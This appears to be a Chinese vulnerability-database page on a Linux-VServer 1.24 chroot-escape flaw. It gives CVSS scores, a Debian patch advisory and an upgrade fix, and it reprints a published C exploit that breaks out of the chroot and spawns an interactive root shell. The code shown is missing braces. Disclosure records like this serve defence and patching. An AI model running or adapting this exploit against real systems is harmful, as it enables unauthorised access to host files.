发布时间 :2004-02-06 00:00:00
修订时间 :2008-09-05 16:43:07

[原文]Linux-VServer 1.24 allows local users with root privileges on a virtual server to gain access to the filesystem outside the virtual server via a modified chroot-again exploit using the chmod command.

[CNNVD]Linux VServer Project可突破CHROOT环境漏洞(CNNVD-200402-030)


- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  linux-vserver-gain-privileges(15073)
(VENDOR_ADVISORY)  BUGTRAQ  20040206 Linux 2.4.24 with vserver 1.24 exploit

- 漏洞信息

Linux VServer Project可突破CHROOT环境漏洞
高危 其他
2004-02-06 00:00:00 2005-10-20 00:00:00

- 公告与补丁

        DSA-1011-1:New kernel-patch-vserver packages fix root exploit

        Source archives:

        Size/MD5 checksum: 637 415731be72a9cd966e2fdb5d4f408c4a

        Size/MD5 checksum: 950447 fe6b34612095d2fbdbaab5aefbd83264

        Size/MD5 checksum: 752 e32069a5ca2ef2bc87794cd6c2160821

        Size/MD5 checksum: 115947 d0bb2cd998a73905189ee24b5f46dd0d

        Size/MD5 checksum: 677831 b315f375b1cef48da1b644dec18f22bd
        Architecture independent components:

        Size/MD5 checksum: 436934 b50048ea819d150d660ed96e3988613b
        Alpha architecture:

        Size/MD5 checksum: 600660 e52fe0ff93e4c9ca7d58fe8386ebab5a
        AMD64 architecture:

        Size/MD5 checksum: 429530 c4155982844c085b7d9bc59d7eaa02c4
        Intel IA-32 architecture:

        Size/MD5 checksum: 398794 56831faa6fa6d76c601fee78251f50eb
        Intel IA-64 architecture:

        Size/MD5 checksum: 640332 ab2b2e4283ca5b62c9d9cf5776b6dadb
        Big endian MIPS architecture:

        Size/MD5 checksum: 612918 e4a60532f25ce776880261de79278e85
        Little endian MIPS architecture:

        Size/MD5 checksum: 614152 f3aee29aad2682878f8ed22064f3fafa
        PowerPC architecture:

        Size/MD5 checksum: 425444 9a7542249c2b70661abab2afd5270462
        IBM S/390 architecture:

        Size/MD5 checksum: 440880 376560971a0d2db4bfd51beb67d42bff
        Sun Sparc architecture:

        Size/MD5 checksum: 395640 51e24ac4754b1aa41277378ee9271a1f
        1. 手工安装补丁包:
         # wget url (url是补丁下载链接地址)
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         # apt-get update
         # apt-get upgrade

- 漏洞信息 (23658)

Linux VServer Project 1.2x CHRoot Breakout Vulnerability (EDBID:23658)
linux local
2004-02-06 Verified
0 Markus Mueller
N/A [点击下载]

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.

/* modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <sys/types.h>
#include <sys/stat.h>

int i;

if (chdir("/") != 0) {
  perror("cd /"); exit(1);
if (mkdir("baz", 0777) != 0) {
  perror("mkdir baz");
if (chroot("baz") != 0) {
  perror("chroot baz"); exit(1);

for (i=0; i<50; i++) {
   if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
   if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
if (chroot(".") != 0) {
  perror("chroot ."); exit(1);
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");

- 漏洞信息

Linux VServer Chroot Escape
Local Access Required Authentication Management, Other
Exploit Public

- 漏洞描述

Linux-Vserver contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker breaks the chroot jail and is able to traverse other directories. This flaw may lead to a loss of confidentiality.

- 时间线

2004-02-06 2004-02-06
Unknow Unknow

- 解决方案

Upgrade to version 1.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete